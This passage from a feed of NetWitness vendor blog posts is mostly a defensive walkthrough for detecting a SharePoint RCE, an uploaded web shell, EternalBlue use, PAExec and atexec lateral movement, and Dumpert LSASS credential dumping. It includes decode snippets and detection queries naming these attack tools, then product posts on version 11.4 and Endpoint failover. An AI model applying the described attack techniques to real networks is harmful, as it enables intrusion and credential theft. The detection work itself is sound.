From here, we could continue to laterally move, dump credentials, and further own the network.


Detection using NetWitness Network

NetWitness doesn't always have to be used for threat hunting; it can also be used to search for things you know about, or are currently researching. Taking the Sharepoint RCE as an example, we can easily search using NetWitness to see if any exploits have taken place. Given that this is a well-documented CVE, we can start our searching by looking for requests to picker.aspx (filename = 'picker.aspx'), which is the vulnerable page - from the below we can see two GET requests, and a POST for Picker.aspx (inbound requests directly to this page are uncommon):

Next we can reconstruct the events to see if there is any useful information we can ascertain. Looking into the HTTP POST, we can see the URI matches what we would expect for this vulnerability. We also see that the POST parameter, ctl00$PlaceHolderDialogBodySection$ctl05$hiddenSpanData, contains the hex encoded and serialized .NET XML payload. The payload parameter also starts with two underscores, which ensures the payload reaches the XML deserialization function as is documented:


Seeing this would already warrant investigation on the Sharepoint server, but let's use some Python so we can take the hex encoded payload and deserialize it to see what was executed:
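A minimal sketch of that decode step, run against a shortened, hypothetical stand-in rather than a real capture (the genuine parameter holds the full serialized .NET gadget):

```python
import re

# Stand-in for the hex blob lifted from the hiddenSpanData POST parameter
# (a real capture holds the complete serialized .NET XML payload).
sample = b'<ExpandedElement/><S>cmd.exe /c echo dGVzdA== > C:\\ProgramData\\bit.txt</S>'
hex_payload = sample.hex()

# Hex-decode, then pull out anything that looks like a cmd.exe invocation.
decoded = bytes.fromhex(hex_payload).decode("utf-8", errors="replace")
commands = re.findall(r"cmd\.exe[^<]*", decoded)
print(commands[0])
```

Even without fully deserializing the gadget, the embedded command string is usually recoverable this way, because it sits as plain text inside the XML.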


From this, we have the exact command that was run on the Sharepoint server that dropped a web shell. This also means we now know the name of the web shell and where it is located, making the next steps of investigation easier:

As analysts, it sometimes pays to do these things to find additional breadcrumbs to pull from, although be careful, as this can be time consuming and other methods can make it a lot easier, like MFT analysis that is described later on in the blog post.


This means we could search for this filename in NetWitness to see if we have any hits (filename = 'bitreview.aspx'):


As you can see from the above highlighted indicators, even without knowing the name of the web shell we would have still uncovered it, as NetWitness created numerous meta values surrounding its usage. A fairly recent addition to the Lua parsers available on RSA Live is fingerprint_minidump.lua - this parser creates the meta value minidump under the Filetype meta key, and also creates the meta value lsass minidump under the Indicators of Compromise meta key. This parser is a fantastic addition as it tags LSASS memory dumps traversing the network, which is uncommon behaviour.


Reconstructing the events, we can see the web shell traffic, which looks strikingly similar to China Chopper. The User-Agent is also a great indicator for this traffic, as it is the name of the tool used to connect to the web shell:


We can Base64 decode the commands from the HTTP POSTs and get an insight into what was being executed. The below shows the initial POST, which returns the current path, operating system, and username:
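That decoding workflow can be sketched as follows. The parameter names and body layout here are hypothetical, as they vary between shells, but the URL-decode-then-Base64-decode pattern is the same one used throughout this traffic:

```python
import base64
from urllib.parse import parse_qs, unquote_plus

# Hypothetical captured POST body: the value is commonly URL-encoded
# Base64, alongside parameters (like the password) that are not.
encoded_cmd = base64.b64encode(b"cd /d C:\\ProgramData\\&dir").decode()
body = "pwd=secret&z1=" + encoded_cmd

# URL-decode the body, split out the parameters, then try a Base64
# decode on each value; values that fail to decode are kept as-is.
decoded = {}
for name, values in parse_qs(unquote_plus(body)).items():
    try:
        decoded[name] = base64.b64decode(values[0]).decode()
    except Exception:
        decoded[name] = values[0]
print(decoded["z1"])
```

Running every captured POST body through a loop like this turns a pile of opaque requests into a readable command history.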


The following shows a directory listing of C:\ProgramData\ being executed, which is where the initial Base64 encoded bitreview.aspx web shell was dropped:


We should continue to Base64 decode all of these commands to gain a better understanding of what the attacker did, but for this blog post I will focus on the important pieces of the traffic. Pivoting into the Events view for the meta value, hex encoded executable, we can see the magic bytes for an executable that have been hex encoded:


Extracting all the hex starting from 4D5A (MZ header in hexadecimal) and decoding it with CyberChef, we can clearly see this is an executable. From here, we could save this file and perform further analysis on it:
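The same carving can be done in a few lines of Python; the hex stream below is a truncated, hypothetical stand-in for the session payload:

```python
# Truncated stand-in for the hex-encoded stream seen in the session;
# a real capture carries the entire hex-encoded executable.
stream = "0d0a4d5a90000300000004000000ffff00000d0a"

# Carve from the MZ header (4D5A) onward and decode the hex to raw bytes.
start = stream.lower().find("4d5a")
carved = bytes.fromhex(stream[start:])
print(carved[:2].decode())  # the DOS 'MZ' magic confirms an executable
```

From here the carved bytes can be written to disk and handed off for static or dynamic analysis.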


Continuing on with Base64 decoding the commands, we come across something interesting: the usage of a tool called eternalblue_exploit7.exe against an endpoint in the same network. This gives the defender additional information surrounding other endpoints of interest to the attacker, and endpoints to focus on:

If you only have packet visibility, you should always decode every command. This will help you as a defender better understand the attacker's actions and uncover additional breadcrumbs. But if you have NetWitness Endpoint, it may be easier to see the commands there, as we will see later.


Knowing EternalBlue uses SMB, we can pivot on all SMB traffic from the Sharepoint server to the targeted endpoint. Opening the Enablers of Compromise meta key, we can see two meta values indicating the use of SMBv1; this is required for EternalBlue to work. There is also a meta value of not implemented under the Error meta key; this is fairly uncommon and can help detect potential EternalBlue exploitation:


Reconstructing the events for the SMBv1 traffic, we come across a session that contains a large sequence of NULLs; this is the beginning of the EternalBlue exploit, and these NULLs essentially move the SMB server state to a point where the vulnerability exists:


With most intrusions, there is typically some form of lateral movement that takes place using SMB. As a defender we should iterate through all possible lateral movement techniques, but for this example I want to see if PAExec has been used. To do this I use the following query (service = 139 && filename = 'svcctl' && filename contains 'paexe'). From the below, we can see that there is indeed some PAExec activity. By default, PAExec also includes the hostname of where the activity occurred from, so from the below filenames, we can tell that this activity came from SP2016, the Sharepoint server. We can also see that a file was transferred, as indicated by the paexec_move0.dat meta value - this is the Outflank-Dumpert.exe tool:
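Because PAExec names its service binary PAExec-&lt;PID&gt;-&lt;SOURCE_HOST&gt;.exe, the source host can be pulled straight out of the filename meta values. A small sketch (the PID below is a hypothetical stand-in; SP2016 matches the server in this intrusion):

```python
import re

# Hypothetical filenames as they might appear under the filename meta
# key for the svcctl named-pipe sessions.
filenames = ["PAExec-8164-SP2016.exe", "paexec_move0.dat", "svcctl"]

# PAExec-<PID>-<SOURCE_HOST>.exe: the filename alone reveals where the
# lateral movement originated.
pattern = re.compile(r"paexec-(\d+)-(?P<src>[^.]+)\.exe", re.IGNORECASE)
sources = [m.group("src") for f in filenames if (m := pattern.match(f))]
print(sources)
```

Feeding a report of PAExec filenames through this kind of extraction quickly maps which hosts are being used as pivot points.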


Back in the Investigation view, under the Indicators of Compromise meta key, we see a meta value of lsass minidump. Pivoting on this value, we see the dumpert.dmp file in the temp\ directory for the endpoint that was accessed over the ADMIN$ share - this is our LSASS minidump created using the Outflank-Dumpert.exe tool:


Navigating back to view all the SMB traffic, and focusing on named pipes (service = 139 && analysis.service = 'named pipe'), we can see a named pipe being used called atsvc. This named pipe gives access to the AT-Scheduler Service on an endpoint and can be used to schedule tasks remotely. We can also see some .tmp files being created in the temp\ directory on this endpoint with what look like randomly generated names, and windows cli admin commands associated with one of them:


Reconstructing the events for this traffic, we can see the scheduled tasks being created. In the below screenshot, we can see the XML and the associated parameters passed, in this instance using CMD to run netstat looking for RDP connections and output the results to %windir%\Temp\rWLePJvp.tmp:


This is lateral movement behaviour via Impacket's atexec tool. It writes the output of the command to a file so it can read it and display it back to the attacker - further analysing the payload, we can see the output that was read from the file and gain insight into what the attacker was after, and subsequently endpoints to investigate:
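The output filenames atexec writes (such as rWLePJvp.tmp above) follow a recognisable shape: to my knowledge, the tool's default is eight random letters followed by .tmp, though this can change between Impacket versions. A hedged sketch that flags filenames of that shape from SMB metadata:

```python
import re

# Hypothetical filenames as they might appear under the filename meta
# key for atsvc named-pipe sessions.
filenames = ["rWLePJvp.tmp", "atsvc", "report.tmp", "KqWzButd.tmp"]

# Exactly eight ASCII letters + ".tmp" matches atexec's default output
# naming; legitimate temp files rarely follow this precise shape.
pattern = re.compile(r"^[A-Za-z]{8}\.tmp$")
suspects = [f for f in filenames if pattern.match(f)]
print(suspects)
```

A match on this pattern over the atsvc pipe, combined with the scheduled-task XML seen earlier, is a strong signal of atexec-style lateral movement.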



Detection using NetWitness Endpoint

As always with NetWitness Endpoint, I like to start my hunting by opening the three compromise keys (IOC, BOC, and EOC). In this case, I only had meta values under the Behaviours of Compromise meta key. I have highlighted a few I deem more interesting with regards to this blog, but you should really investigate all of them:


Let's start with the runs certutil with decode arguments meta value. Opening this in the Events view, we can see the parameter that was executed, which is a Base64 encoded value being echoed to the C:\ProgramData\ directory, and then certutil being used to decode it and push it to a directory on the server:


From here, we could download the MFT of the endpoint:


Locate the file that was decoded, download it locally, and see what the contents are:


From the contents of the file, we can see that this is a web shell:


We also observed the attacker initially drop a file in the C:\ProgramData\ directory, so this is also a directory of interest and somewhere we should browse to within the MFT - here we uncover the attacker's tools, which we could download and analyse:


Navigating back to the Investigate view and opening the meta value http daemon runs command prompt in the Events view, we can see the HTTP daemon, w3wp.exe, executing reconnaissance commands on the Sharepoint server:

This is a classic indicator for a web shell, whereby we have an HTTP daemon spawning CMD to execute commands.


Further analysis of the commands executed by the attacker shows EternalBlue executables being run against an endpoint. After this, the attacker uses PAExec with a user called helpdesk to connect to the endpoint - implying that the EternalBlue exploit created a user called helpdesk that allowed them to laterally move (NOTE: we will see how the user creation via this exploit looks a little later on):


Navigating back to Investigate, and this time opening the Events view for creates local user account, we see lsass.exe running net.exe to create a user account called helpdesk; this is the EternalBlue exploit. LSASS should never create a user, so this is a high-fidelity indicator of malicious activity:


Another common attacker action is to dump credentials. Due to the popularity of Mimikatz, attackers are looking for other methods of dumping credentials; this typically involves creating a memory dump of the LSASS process. We can therefore use the following query (action = 'openosprocess' && filename.dst = 'lsass.exe'), and open the Filename Source meta key to look for something opening LSASS that stands out as anomalous. Here we can see a suspect executable opening LSASS, named Outflank-Dumpert.exe:


As defenders, we should continue to triage all of the meta values observed. But for this blog post, I feel we have demonstrated NetWitness' ability to detect these threats.


Detection Rules

The following table lists some application rules you can deploy to help with identifying these tools and behaviours:





Packet Decoder

Requests of interest to Picker.aspx

service = 80 && action = 'post' && filename = 'picker.aspx' && directory contains '_layout'


Packet Decoder

AntSword tool usage

client begins 'antsword'


Packet Decoder

Possible Impacket atexec usage

service = 139 && analysis.service = 'named pipe' && filename = 'atsvc' && filename ends 'tmp'


Packet Decoder

Dumpert LSASS dump

filename = 'dumpert.dmp'


Packet Decoder

Possible EternalBlue exploit

service = 139 && error = 'not implemented' && eoc = 'smb v1 response'


Packet Decoder

PAExec activity

service = 139 && filename = 'svcctl' && filename contains 'paexe'



Endpoint Log Hybrid

Opens OS process LSASS

action = 'openosprocess' && filename.dst='lsass.exe'


Endpoint Log Hybrid

LSASS creates user

filename.src = 'lsass.exe' && filename.dst = 'net.exe' && param.dst contains '/add'




Threat actors are consistently evolving and developing new attack methods, but they are also using tried and tested methods as well - there is no need for them to use a new exploit when a well-known one works just fine on an unpatched system. Defenders should not only be keeping up to date with the new, but also retroactively searching their data sets for the old.

Hi everyone!  In this video blog, I provide a demo of a full stack 11.4 RSA NetWitness Platform deployment within AWS. The demo deployment includes the following hosts:

  • NW Server
  • Network Hybrid
  • Health & Wellness Beta
  • Analyst UI


Please like or comment to let me know if this vblog was useful.



RSA NetWitness Platform - Product Manager

Visualization techniques can help an analyst make sense of a given data set by exposing scale, relationships, and features that would be almost impossible to derive by just looking at a list of individual data points.  As of RSA NetWitness Platform 11.4, we have added new physics and layout techniques to the nodal diagram in Respond in order to make better sense of the data both for when using Respond as an Incident/Case Management tool or when simply using Respond to group events and track non-case investigations (see Using Respond for Data Exploration for some ideas).




Clustering by Entity Type

Prior to 11.4, the nodal graph evenly distributed the nodes regardless of entity type (Host, IP, User, MAC, File). Improvements were made to introduce intelligent clustering such that entities of the same type not only retain their distinct color, but also have a higher chance of being clustered together.  This layout improvement makes it clearer to see relationships between different entity types, particularly when dealing with larger sets of data.


Variable Edge Forces Based on Relationship Type

Prior to 11.4, all edges between nodes were treated equally, resulting in lengths being rendered equally between all sets of connected nodes.  Improvements were made to adjust the relative attraction forces, helping to better distinguish attribute type relationships ("as", "is named", "belongs to", and "has file") from action type relationships ("calls", "communicates with", "uses").  Edges representing attributes will tend to be much shorter than those representing actions, which has the added benefit of reducing the number of overlapping edges, making relationships, scope, and sprawl much easier for an analyst to see at a glance.



Separation of Disconnected Clusters

Prior to 11.4, all nodes and edges were grouped into one large cluster, even if certain nodes in the data set did not have any relationship with others, requiring tedious manual dragging of nodes in order to distinguish the groupings.  Now, disjoint clusters of nodes are repelled from one another upon initial layout, making it extremely clear which sets of data are joined by some kind of relationship.  This is particularly helpful when using Respond for general data exploration of larger data sets (vs visualizing a single incident) that do not necessarily have commonality, both drawing the analyst's eyes to potentially interesting outliers and once again reducing the number of overlapping edges that have historically made certain nodal graphs difficult to read, depending on the data set.

Improved Nodal Interaction

In addition to the physics governing new layouts, improvements have been made to nodal interaction to help take advantage of them.  Given the potential size and complexity of data sets, despite the introduction of layout and force techniques, the layout may not always be optimal.  The goal was to improve interaction by minimizing the number of graph drags needed by an analyst to make sense of even the most tangled data sets.  When dragged, nodes with high connectivity will generally attract other nodes with which a relationship exists.  Also, once any node is manually dragged into position, manipulating the position of other nodes will no longer impart a moving force, meaning the original dragged node will stay in place.  To "unpin" dragged nodes and have them spring back into place, simply double click.



As always, if you have any feedback or suggestions on how to make this experience even better, please leave a comment or, better yet, search, submit, and vote on product enhancements on the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform 


Happy Hunting!

Did you know that you can use Respond for data exploration, even if you aren't using it for Incident Management?  While the naming convention certainly does not suggest it, Respond can be just as useful outside of incident response as a place for analysts to group events of interest during investigation and hunting efforts.  Using Respond as more of an analyst workspace can help teams collaborate better, track streams of thought, and take advantage of Respond's new and improved visualization capabilities as of 11.4 (see Visualization Enhancements in RSA NetWitness Platform 11.4 for details).




Step 1 - Create an "Incident" from Events view

Once you have a set of data that carries significance, you can select any set or subset of events contained in a data set and use it to create a new "Incident".  For our purposes here, you'll have to look past the current naming conventions of Alerts and Incidents and just think of it as a grouping of events (log, endpoint, or network sessions).


What data sets to use is largely up to you, but this type of approach is particularly useful when following a methodology that requires systematically carving larger data sets into smaller, more manageable ones.  The example above is based on RSA's Network Hunting Guide, details of which can be found here: RSA NetWitness Hunting Guide 


Step 2 - Open in Respond

Once opened, all of the capabilities available when using Respond for Incident Management are available.  It doesn't mean you have to use all of them, but you may find some of them to be a handy way to tag in other analysts (Tasks) and keep track of your analysis (Journal).  And if you do happen to find something malicious in the data set, all of the relevant information is already contained.


In the example above, we're seeing if anything interesting shows up in the data set for "All outbound HTTP sessions using the POST method".  The nodal diagram can be a useful way to see how the data is distributed between entities (larger bubbles meaning a larger number of events), which sub data sets within the larger one are dealing with disjoint sets of entities (Files, Hosts, IPs, Users, MAC Addresses), and can key your eye towards groupings that lead to deeper levels of inspection.  


Step 3 - Use Respond Tools to Track, Pivot, and Collaborate

View Event Cards

In-line Event Reconstruction (eg. Network Reconstruction)

Entity Details - Pivot To Other Views 



Add New Events 

And don't forget that you can always add more events to the same Respond incident to expand investigation if more leads are uncovered. Simply start from the top, and "Add To Incident".


As always, if you have any feedback or suggestions on how to make this experience even better, please leave a comment or, better yet, search, submit, and vote on product enhancements on the RSA Ideas portal: RSA Ideas for the RSA NetWitness Platform 


Happy Hunting!

The newest version of the RSA NetWitness Platform is almost here!


We’re excited to release the 11.4 version of the RSA NetWitness Platform very soon. We’ve worked hard on many new features and enhancements that will help users detect, investigate, and understand threats in their organizations.


This version introduces new features in analyst investigation, UEBA, Respond, administrative functions, and RSA NetWitness Endpoint that collectively make security teams more efficient and arm them with the most relevant and actionable security data. Some of the more noteworthy 11.4 features include:


  • Enhanced Investigation Capabilities: Fully integrated free-text search, auto-suggestion, & search profiles
  • Smarter Network Threat & Anomaly Detection: UEBA expanded to analyze packet data with 24 new indicators
  • Improved Visualization of Incidents: Respond visualizations are clearer with enhanced relationship mapping
  • Expanded Functions for Endpoint Response: Powerful Host forensic actions and dynamic analysis directly from the RSA NetWitness Platform
  • Simplified File Collection from Endpoint Agents
  • Single Sign-on Capability
  • Distributed Analyst User Interfaces
  • New Health and Wellness (BETA)

This is not an exhaustive list of all the changes; please see the Release Documentation for the nitty-gritty details and the full list of changes we've made in this release.


In the coming days and weeks, we’ll be publishing additional blog entries that demonstrate how this new functionality operates, and the benefits customers can expect to realize in 11.4.


The RSA Product team is excited for you to try this new release!

High availability (HA) is a common need in many enterprise architectures, so NetWitness Endpoint has some built-in capabilities that allow organizations to achieve an HA setup with fairly minimal configuration and implementation effort.


An overview of the setup:

  1. Install Primary and Alternate Endpoint Log Hybrids (ELH)
  2. Create a DNS CNAME record pointing to your Primary ELH
  3. Create Endpoint Policies with the CNAME record's alias value


The failover procedure:

  1. Change the CNAME record to point to the Alternate ELH


And the failback procedure:

  1. Change the CNAME record back to the Primary ELH


To start, you'll need to have an ELH already installed and orchestrated within your environment.  We'll assume this is your Primary ELH, where your endpoint agents will ordinarily be checking into, and what you need to have an alternate for in the event of a failure (hardware breaks, datacenter loses power, region-wide catastrophic event...whatever).


To install your Alternate ELH (where your endpoint agents should failover to) you'll need to follow the instructions here:  under "Task 3 - Configuring Multiple Endpoint Log Hybrid".

**Make sure that you follow these instructions exactly...I did not the first time I set this up in my lab, and so of course my Alternate ELH did not function properly in my NetWitness environment...**


Once you have your Alternate ELH fully installed and orchestrated, your next step will be to create a DNS CNAME record.  This alias will be the key to the entire HA implementation.  You'll want to point the record to your Primary ELH; e.g.:


**Be aware that Windows DNS defaults to a 60 minute TTL...this will directly impact how quickly your endpoint agents will point to the Target Host FQDN in the CNAME record, so if 60 minutes is too long to wait for endpoints to be available during a failover you might want to consider setting the TTL lower...** (props to John Snider for helping me identify this in my lab during my testing)


And your last step in the initial setup will be to create Endpoint Policies that use this alias value.  In the NetWitness UI, navigate to Admin/Endpoint Sources/Policies and either modify an existing EDR policy (the Default, for instance) or create a new EDR policy.  The relevant configuration option in the EDR policy setting is the "Endpoint Server" option within the "Endpoint Server Settings" section:


When editing this option in the Policy, you'll want to choose your Primary ELH in the "Endpoint Server" dropdown and (the most important part) enter the CNAME record's alias as the "Server Alias":


Add and/or modify any additional policy settings as required for your organization and NetWitness environment, and when complete be sure to Publish your changes. (Guide to configuring Endpoint Groups and Policies here: NetWitness Endpoint Configuration Guide for RSA NetWitness Platform 11.x - Table of Contents)


You can test your setup and environment by running some nslookup commands from endpoints within your environment to check that your DNS CNAME is working properly and endpoints are resolving the alias to the correct target (Primary ELH at this point), as well as creating an Endpoint EDR Policy to point some active endpoint agents to the Alternate ELH (**this check is rather important, as it will help you confirm that your Alternate ELH is installed, orchestrated, and configured correctly**).
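That nslookup check can also be scripted. A minimal sketch, assuming a hypothetical alias name (substitute the CNAME record you actually created):

```python
import socket

# Hypothetical CNAME alias; substitute the record you created for the ELHs.
alias = "elh.example.local"

# gethostbyname_ex follows the CNAME chain; the first element returned is
# the canonical name (your Primary or Alternate ELH), much like nslookup.
try:
    canonical, _aliases, addresses = socket.gethostbyname_ex(alias)
    print(alias, "resolves to", canonical, addresses)
except socket.gaierror as err:
    print("lookup failed for", alias, "-", err)
```

Running this from a sample of endpoints before and after a failover gives quick confirmation that the TTL has expired and agents are resolving the alias to the intended ELH.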


Prior to moving on to the next step, ensure that all your agents have received the "Updated" Policy - if any show in the UI with a "Pending" status after you've made these changes, then that means they have not yet updated:


Assuming all your tests come back positive and all your agents' policies are showing "Updated", you can now simulate a failure to validate that your setup is, indeed, HA-capable. This can be quite simple, and the failover process similarly straightforward.


  1. Shutdown the Primary ELH
  2. Modify the DNS CNAME record to point to the Secondary ELH
    1. This is where the TTL value will become important...the longer the TTL the longer it may take your endpoints to change over to the Alternate ELH
    2. Also...there is no need to change the existing Endpoint Policy, as the Server Alias you already entered will ensure your endpoints follow the DNS change
  3. Confirm that you see endpoints talking to the Alternate ELH
    1. Run tcpdump on the Alternate ELH to check for incoming UDP and TCP packets from endpoints
    2. See hosts showing up in the UI
    3. Investigate hosts


After Steps 1 and 2 are complete, you can confirm that agents are communicating with the Alternate ELH by running tcpdump on that Alternate ELH to look for the UDP check-ins and the TCP tracking/scan data uploads, as well as confirming in the UI that you can see and investigate hosts:



Once your validation and testing is complete, you can simply revert the procedure by powering on the Primary ELH, powering off the Alternate ELH, and modifying the CNAME record to point back to the Primary ELH.


Of course, during an actual failure event, your only action to ensure HA of NetWitness Endpoint would be to change the CNAME record, so be sure to have a procedure in place for an emergency change control, if necessary in your organization.
